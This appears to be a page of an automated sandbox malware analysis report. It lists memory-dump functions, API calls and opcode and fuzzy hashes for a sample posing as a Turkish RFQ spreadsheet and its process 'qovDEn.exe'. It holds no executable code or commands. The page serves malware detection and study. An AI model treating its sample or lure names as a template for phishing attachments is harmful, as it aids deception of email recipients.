Function 06C3F3B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e30dc1b6323066321fde21f9441e0cc6f26e09990355a9e1cf8113a9cdffdc
Instruction ID: 261356835684ea1a2b5a5e12073b5ec8a299b57499b67a1c7eccf55d7f205531
Opcode Fuzzy Hash: 86e30dc1b6323066321fde21f9441e0cc6f26e09990355a9e1cf8113a9cdffdc
Instruction Fuzzy Hash: 75C1AC74E01228CFDB54DFA5C984B9DBBB2EF89300F6080A9D809AB354DB359E85CF50

Function 06C3EF60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bda438e81cf1a9e231165a81c0179ef91cf30cc4f08c1bd9a5418ee6a1c2f31
Instruction ID: 8d02e6c579b65b3386463e09ae486a45fa248ac10c5daa9b73eb0f14513879ae
Opcode Fuzzy Hash: 8bda438e81cf1a9e231165a81c0179ef91cf30cc4f08c1bd9a5418ee6a1c2f31
Instruction Fuzzy Hash: 2FC1AD74E01228CFDB54DFA5C984B9DBBB2EF89300F6080A9D809AB354DB359E85DF50

Function 06C3EB08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac742a43d7ad86e8494a1cf88f395d9c410b97dd7a586a39ae17fb48e2d3b0a3
Instruction ID: a07b911debf4fa4d8240c4b1c2c70fecdd77fa32300b02cd2b2433525b54a774
Opcode Fuzzy Hash: ac742a43d7ad86e8494a1cf88f395d9c410b97dd7a586a39ae17fb48e2d3b0a3
Instruction Fuzzy Hash: 83C1AD74E01228CFDB54DFA5C984B9DBBB2EF89300F5081AAD809AB354DB359E85DF50

Function 06C3D0F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48f241c6a03ac9de8c4cd9a148e67859a39646845b3620546df8e7157113c566
Instruction ID: bf17a196ca7f1b7962af982dbc34ba7e68356951cc36ff2beac0b7639dc04881
Opcode Fuzzy Hash: 48f241c6a03ac9de8c4cd9a148e67859a39646845b3620546df8e7157113c566
Instruction Fuzzy Hash: F0C19C74E01228CFDB54DFA5C984B9DBBB2EF89301F6081A9D809AB354DB359E85CF50

Function 06C3CCA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3264e2110231ddf5993b3be45cfc870e9f8314ca298b96f596cf764ae886f68a
Instruction ID: 6020efc481a9ef5ca47f05db618a0e6a0f70888af4387b2ff7817c88bea740cf
Opcode Fuzzy Hash: 3264e2110231ddf5993b3be45cfc870e9f8314ca298b96f596cf764ae886f68a
Instruction Fuzzy Hash: 2AC19D74E01228CFDB54DFA5C984B9DBBB2EF89300F6081A9D809AB354DB359E85DF50

Function 06C3F810 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db2c1fe03e8cd03efeba228f1deb635d05f6ab73efb04d41311dbca3ec11b5b
Instruction ID: f75188e0e46f617af74f62a338e204dd83540ca1f6d37db6690c27369d7463cf
Opcode Fuzzy Hash: 5db2c1fe03e8cd03efeba228f1deb635d05f6ab73efb04d41311dbca3ec11b5b
Instruction Fuzzy Hash: 4DC1AD74E01228CFDB54DFA5D984B9DBBB2EF89300F2080A9D809AB354DB359E85DF50

Function 06C3D9A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec528dfd2b87c525b7e93c8837d638a76c879f7638281d7b39e1410afa02af75
Instruction ID: 77a31077880094dd9633f48f37d7e6e2bd97b4ba338963dc4da153a4c671db20
Opcode Fuzzy Hash: ec528dfd2b87c525b7e93c8837d638a76c879f7638281d7b39e1410afa02af75
Instruction Fuzzy Hash: 83C19C74E01228CFDB54DFA5C984B9DBBB2EF89300F6081A9D809AB354DB359E85DF50

Function 06C3D550 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b37467db8fd2bd6b129df46deb101002c7139e02224eec742e36e54282b2a07c
Instruction ID: 3a14313745fe9cdc3872a435c8880d51844ee44f2485e33407e5742ac8cbd511
Opcode Fuzzy Hash: b37467db8fd2bd6b129df46deb101002c7139e02224eec742e36e54282b2a07c
Instruction Fuzzy Hash: F7C19C74E01228CFDB54DFA5C994B9DBBB2EF89300F6080A9D809AB354DB359E85DF50

Analysis Process: qovDEn.exePID: 4068, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	71
Total number of Limit Nodes:	6

Executed Functions

Function 02D7D6A0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02D7D71E
GetCurrentThread.KERNEL32 ref: 02D7D75B
GetCurrentProcess.KERNEL32 ref: 02D7D798
GetCurrentThreadId.KERNEL32 ref: 02D7D7F1

Memory Dump Source

Source File: 0000000B.00000002.1595049743.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d70000_qovDEn.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: fb6ab3dd0d8ad23c1405f4152fa55edbbb0d59058d21b3a69504a9d55a65b982
Instruction ID: fb17b960c0b9a7ff5783196ba6f32813b17a65de3ddde9a09df35699e377cd0f
Opcode Fuzzy Hash: fb6ab3dd0d8ad23c1405f4152fa55edbbb0d59058d21b3a69504a9d55a65b982
Instruction Fuzzy Hash: 695135B090134A8FDB14DFAAD548BDEBBF2BF88314F208459E419A73A0DB345944CF65

Function 02D7B3F9 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02D7B65E

Memory Dump Source

Source File: 0000000B.00000002.1595049743.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d70000_qovDEn.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0f3bb0e1dad61ffa8baf10ce2ccb3dcad66edbd9c31be44cc1a703eba6262cda
Instruction ID: 6fa08374587c1a62d6aa567af8e84fd55e84257f7275786f80693f53e3d3090f
Opcode Fuzzy Hash: 0f3bb0e1dad61ffa8baf10ce2ccb3dcad66edbd9c31be44cc1a703eba6262cda
Instruction Fuzzy Hash: 8C812570A00B058FD724DF2AD45579ABBF1FF88308F108A2ED49A97B50E779E905CB91

Function 02D758EC Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02D759A9

Memory Dump Source

Source File: 0000000B.00000002.1595049743.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d70000_qovDEn.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0df1a19811fdefb867446bba09869b564b6232eb7cd548d5bb2c3a3e432c3d27
Instruction ID: 2ab2f536869f1a26498556ea76671787a2b2e240ee7d480895a557890f941d38
Opcode Fuzzy Hash: 0df1a19811fdefb867446bba09869b564b6232eb7cd548d5bb2c3a3e432c3d27
Instruction Fuzzy Hash: B141F3B1D00719CFDB24DFA9C8847CDBBB1BF88704F60816AD409AB251DB756946CF51

Function 02D744B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02D759A9

Memory Dump Source

Source File: 0000000B.00000002.1595049743.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d70000_qovDEn.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1d703ea2471185dd350356a48b157ed3937010200e873156543501eb2a9b7c41
Instruction ID: 86b2a83c85907c79a2a66b2879987a11f15fda521e5f1651212cfb6c0b35feef
Opcode Fuzzy Hash: 1d703ea2471185dd350356a48b157ed3937010200e873156543501eb2a9b7c41
Instruction Fuzzy Hash: 2C41C170D00719CFDB24DFA9C884BCEBBB5BF88704F60816AD409AB251DB756945CF91

Function 02D7D8E8 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D7D96F

Memory Dump Source

Source File: 0000000B.00000002.1595049743.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d70000_qovDEn.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2227839a04f322f092434e6c774f7a45b7f4632643c9fd60207cff80358682a9
Instruction ID: 80ecc3ec9a9dee03746a91e392897b028b5b5bd3271b5b7375fc0f058578b119
Opcode Fuzzy Hash: 2227839a04f322f092434e6c774f7a45b7f4632643c9fd60207cff80358682a9
Instruction Fuzzy Hash: 2621E4B59002499FDB10CFAAD884ADEFBF9FF48320F14801AE954A3350D378A944CF65

Function 02D7B5F8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02D7B65E

Memory Dump Source

Source File: 0000000B.00000002.1595049743.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d70000_qovDEn.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6e579c57406e5cf330826c0504f10ac577d3230f120aa2a8e1d9eb8dd3b4cb37
Instruction ID: 4510976d2eca4bd614ed9766ed4ff0d120346207e57a9e99d13609cf11cd6c1d
Opcode Fuzzy Hash: 6e579c57406e5cf330826c0504f10ac577d3230f120aa2a8e1d9eb8dd3b4cb37
Instruction Fuzzy Hash: FC110FB5C002898FDB10DF9AC444BDEFBF4EB88328F10842AD519A7710D379A545CFA5

Function 014ED1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1594715844.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_14ed000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 321c5b6f602e19b81efbe7eaa03927d1703dd80b22b0313f50e36328f6f7402a
Instruction ID: c77d9f460d8bfb284a8eef30caf13c871561d6f1ee7da31f04ffdcb53506bbeb
Opcode Fuzzy Hash: 321c5b6f602e19b81efbe7eaa03927d1703dd80b22b0313f50e36328f6f7402a
Instruction Fuzzy Hash: 05210671904300DFDB05DF94D9C8B27BBA5FB88321F20C56AE9050B366C336D416CBA1

Function 014ED4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1594715844.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_14ed000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e442b8f3d688981f4bbd653144d0ac2349a11ac575fba710f1d861657636105f
Instruction ID: e3507977a69377033daa0f083a07982ce3ffe2f3cd1d27c2f19c5f51abea0b96
Opcode Fuzzy Hash: e442b8f3d688981f4bbd653144d0ac2349a11ac575fba710f1d861657636105f
Instruction Fuzzy Hash: 0A21F172904240DFDB05DF54D988B26BFA5FB88229F20C56AE8090A266C336D456CBA2

Function 014FD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1594761497.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_14fd000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa855d587383a902230303c3f5f37646cd940843361c53d7b0b3d43710a22fa0
Instruction ID: b3a8ad1eaffff11620d59321056a099ac28b9d3eaa6bee484792b6d525c9ae1f
Opcode Fuzzy Hash: aa855d587383a902230303c3f5f37646cd940843361c53d7b0b3d43710a22fa0
Instruction Fuzzy Hash: 802122B5A04300DFDB15DF54D884B16BBA1FB84318F20C56EEA0A4B3A6C33AD407CA62

Function 014FD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1594761497.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_14fd000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 619903d8962ae8e03f0472d82ec39702bf5e4b6df59613079e511d0d84e67ee8
Instruction ID: 9843a3d156cf2494cf885dc07aff754838cb9e808b840e513e219a586d00e332
Opcode Fuzzy Hash: 619903d8962ae8e03f0472d82ec39702bf5e4b6df59613079e511d0d84e67ee8
Instruction Fuzzy Hash: 36216B79A04300DFDB01DF94D9C4B16BB61FB84324F20C56EDA094B362C336D406CBA2

Function 014FD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1594761497.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_14fd000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12b4c810058ad084015523122548bdfb21caaf043073d615eac65c2b644f315e
Instruction ID: 9b796dc1d2347c772bacfd3dcce84d5baacf86836e2d06e1896b4c2bba7048ad
Opcode Fuzzy Hash: 12b4c810058ad084015523122548bdfb21caaf043073d615eac65c2b644f315e
Instruction Fuzzy Hash: D5217F755093808FCB06CF24D590716BF71EB46218F28C5EAD9498B7A7C33A980ACB62

Function 014ED1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1594715844.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_14ed000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac1a99fa3094d31d6b273ac7c7f03b519f34febd85b0dbf2f78a0125c4c0676e
Instruction ID: 0f7f907d4b8e08487989548133c2e1c16106c2dedfaae827a845a7ed0915bda1
Opcode Fuzzy Hash: ac1a99fa3094d31d6b273ac7c7f03b519f34febd85b0dbf2f78a0125c4c0676e
Instruction Fuzzy Hash: DC219D76904244DFDB06CF54D9C4B16BFA2FB84324F24C5AADD490A666C33AD426CBA1

Function 014ED4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1594715844.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_14ed000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction ID: f03d170453100a8259da5c6a705997df76007ba19a635a4353764de4a4e4eb6d
Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction Fuzzy Hash: D711B176904280CFCB16CF54D9C4B16BFB2FB84325F24C6AAD8490B667C33AD456CBA1

Function 014FD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1594761497.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_14fd000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction ID: 2fd51604c512a5f31e2722a3eaeca66f438104aef40df15c32c393560998719c
Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction Fuzzy Hash: 5811BE79904240DFCB02CF54C5C0B16BB61FB84224F24C6AED9494B3A6C33AD40ACB92

Analysis Process: qovDEn.exePID: 2816, Parent PID: 4068COMMON

Executed Functions

Function 057EA088 Relevance: .9, Instructions: 887COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47049c681d2326f02239acbcfd484e00e9a3512c6c4f8c4f8e57987bb9686c1e
Instruction ID: 0251e1e5ad357d7e54eafd4e17494a59fe16259d190d6adddb5ceb449b67f65f
Opcode Fuzzy Hash: 47049c681d2326f02239acbcfd484e00e9a3512c6c4f8c4f8e57987bb9686c1e
Instruction Fuzzy Hash: 8A825D71A00309DFCB15CFA8C988AAEBBF2FF89310F158559E805AB3A1D735E941DB50

Function 057E69A0 Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bdecc8a1cd39e21a9a2d35050f5bd493ffb1d5e5db021ac76521a317aee5834
Instruction ID: a51dcb6f2d51329bdc8081d93b628927e6168ff4af397b4a91a73361186e8aa6
Opcode Fuzzy Hash: 2bdecc8a1cd39e21a9a2d35050f5bd493ffb1d5e5db021ac76521a317aee5834
Instruction Fuzzy Hash: FF125A70A002199FDB18DF69D854BAEBBB6FF88300F248569E906DB391DF349D41DB90

Function 057E29EC Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea3a6d3090ff45f3b7e4f9fc136031c6aeff7c5d2b7232c88a87734e6a925b88
Instruction ID: 3ba1ef7fd1cc47555721619cd906797254cebfedede8e3535a452d8ef8b046a5
Opcode Fuzzy Hash: ea3a6d3090ff45f3b7e4f9fc136031c6aeff7c5d2b7232c88a87734e6a925b88
Instruction Fuzzy Hash: BFF102B0D143648FD7358B7C8B9C6BB7BF2BB8E210F158C598055D7602EA29F940B762

Function 057E7118 Relevance: .4, Instructions: 359COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fdb23a8bdc56cebe38d33eb5223918415f133684b8badc870309be9852fee54
Instruction ID: bb0a9a159d3912f276bd6ad1a05ec8ff282c8dee5bbad74b453da89f1a423da7
Opcode Fuzzy Hash: 8fdb23a8bdc56cebe38d33eb5223918415f133684b8badc870309be9852fee54
Instruction Fuzzy Hash: 39E11970A00299DFCB58CFA9C884EADBBB2FF8D355F558065E805AB261D730EC41DB90

Function 057EC147 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e77e95e15e27742b4557f724b2afa0ca446b2181e8f5944b6823a88736b9712d
Instruction ID: 62b49c0c7206d8479bfcd41172dd7bd603d44e595a4920c356e61ece3d75c126
Opcode Fuzzy Hash: e77e95e15e27742b4557f724b2afa0ca446b2181e8f5944b6823a88736b9712d
Instruction Fuzzy Hash: EBA1C375E00318CFEB15DFA9D984A9DBBB6BF89310F14806AE409AB365DB309C41DF51

Function 057EC468 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0558273e8910a5f683e450f6ff4506ba32059e6f8433e4728d976c07e6b154f5
Instruction ID: 450a0e460754e991113f59540623a3da403556d5518a6f47484590c0d2beb5c7
Opcode Fuzzy Hash: 0558273e8910a5f683e450f6ff4506ba32059e6f8433e4728d976c07e6b154f5
Instruction Fuzzy Hash: 4A91A374E00318CFEB18DFAAD984A9EBBF6BF89300F249069D419AB355DB309941DF51

Function 057E5362 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02debb3401f1852e1adbe32e475acbdde11f85febd984f98c1a853dc2ed4e11d
Instruction ID: 97f639158bc853af458a3bbccbbe17b91359229b564519b2349ada3e8b49c475
Opcode Fuzzy Hash: 02debb3401f1852e1adbe32e475acbdde11f85febd984f98c1a853dc2ed4e11d
Instruction Fuzzy Hash: 1B81B174E003188FEB14DFAAD884A9DBBF2BF89304F14C06AD809AB365DB309945DF10

Function 057ED278 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 247825b8ababd4755271aa885abd40aed6e461f19d1d27b796d3625a3a8f52e6
Instruction ID: a10a7c04fca7fc1bfabb55b0b85464b9670d00df37d4eb436aec4c4ff4a5cf82
Opcode Fuzzy Hash: 247825b8ababd4755271aa885abd40aed6e461f19d1d27b796d3625a3a8f52e6
Instruction Fuzzy Hash: A9819374E00218CFEB24DFAAD984A9DBBF2BF89300F14D169E819AB365DB305941DF50

Function 057ECCD8 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a02b479c51f38db99410d9f35b23c7935ee248bfc7808b97912705f08a6d1fe7
Instruction ID: ed0436b182a17822c927d6670893d3366af0b3bbe8ad2f088e4c6dc290d65a2a
Opcode Fuzzy Hash: a02b479c51f38db99410d9f35b23c7935ee248bfc7808b97912705f08a6d1fe7
Instruction Fuzzy Hash: 0F819174E00218CFEB58DFAAD984A9DBBF6BF88300F14D069E419AB365DB305945DF50

Function 057ECA08 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f86b95cd9d988d3cdd86a0222ce312c47d84fb14358862af1e849b7dcb60ca
Instruction ID: 8019e1ee73b8b4f9741456142339de6d6b7d213ed344dee4c12a5a6c96cc9393
Opcode Fuzzy Hash: 08f86b95cd9d988d3cdd86a0222ce312c47d84fb14358862af1e849b7dcb60ca
Instruction Fuzzy Hash: AC819174E002188FEB58DFAAD944A9DBBF6BF88310F14D069E419AB365DB309941DF50

Function 057EC738 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc6e70381e878d1f09a509add16baa1efafdfd69634580811064ac06a388dd2b
Instruction ID: 829d1fc06ed0cc56dd33ea5d0fe7993aa9bc853098ae30c34e8308da9a49bb2f
Opcode Fuzzy Hash: fc6e70381e878d1f09a509add16baa1efafdfd69634580811064ac06a388dd2b
Instruction Fuzzy Hash: 84819274E00218CFEB58DFAAD984A9DBBF2BF88300F14D069D419AB365DB349941DF50

Function 057ECFAB Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53b32c53111fe57822e3f02b9051ccffe1c3b52c4b724a204311bcb1f041ee29
Instruction ID: 432a042da1ba1e9df2d0308fa02122fdcf3b75ed3003c26e58e8f1a3d2d388b6
Opcode Fuzzy Hash: 53b32c53111fe57822e3f02b9051ccffe1c3b52c4b724a204311bcb1f041ee29
Instruction Fuzzy Hash: E7819474E00218CFEB58DFAAD984A9DBBF2BF88300F15D069D419AB365DB309945DF10

Function 057EE988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2771218024.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_57e0000_qovDEn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 707ef07b4e8ec9f38db15b70d656a827cc0715119400f9e2f4c0326afdee3a75
Instruction ID: 799bad7d911920f729db009e86230912f4092a14260c774913eb6a1f624c74bc
